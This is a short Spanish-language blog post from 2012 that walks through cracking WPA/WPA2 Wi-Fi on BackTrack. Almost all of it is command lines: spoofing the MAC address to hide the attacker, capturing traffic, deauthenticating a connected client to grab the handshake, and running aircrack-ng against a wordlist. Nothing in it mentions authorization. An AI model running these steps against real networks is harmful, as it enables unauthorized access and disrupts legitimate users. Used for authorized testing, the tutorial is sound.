Translate

jueves, 14 de junio de 2012

Pentesting en redes con Seguridad WPA - WPA2

No aguanté la tentación y decidí incluir ahora las pruebas en una red de tipo WPA o WPA2;

Como hicimos previamente, es recomendable ofuscar o modificar la dirección MAC de nuestra tarjeta de red; para eso escribimos en una consola:
(el simbolo # es para indicar el prompt de nuestro BackTrack 5R2)

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
# airmon-ng start wifi0




Luego miramos que redes estan en el alcance:

# airodump-ng wlan0
# airodump-ng -c (channel) -w (capture file) --bssid (AP MAC) wlan0

Desplegar BSSID (AP MAC) y las Estaciones o dispositivos que estén conectados a la red (Client MAC)

# aireplay-ng -0 1 -a (AP MAC) -c (Client MAC) wlan0

Generamos la deautenticación; para este tipo de redes debemos deautenticar a algun dispositivo que ya este autenticado, y escuchar su saludo (Handshake) en donde estará la clave encriptada; Si es exitoso detener airodump y ejecutar aircrack

aircrack-ng -w (Diccionario.lst o similar) -b (AP MAC) psk*.cap

En esta técnica es indispensable contar con un buen  diccionario, de lo contrario no vamos a tener mucho éxito.
Espero que logren muchos hallazgos!!!

No hay comentarios:

Publicar un comentario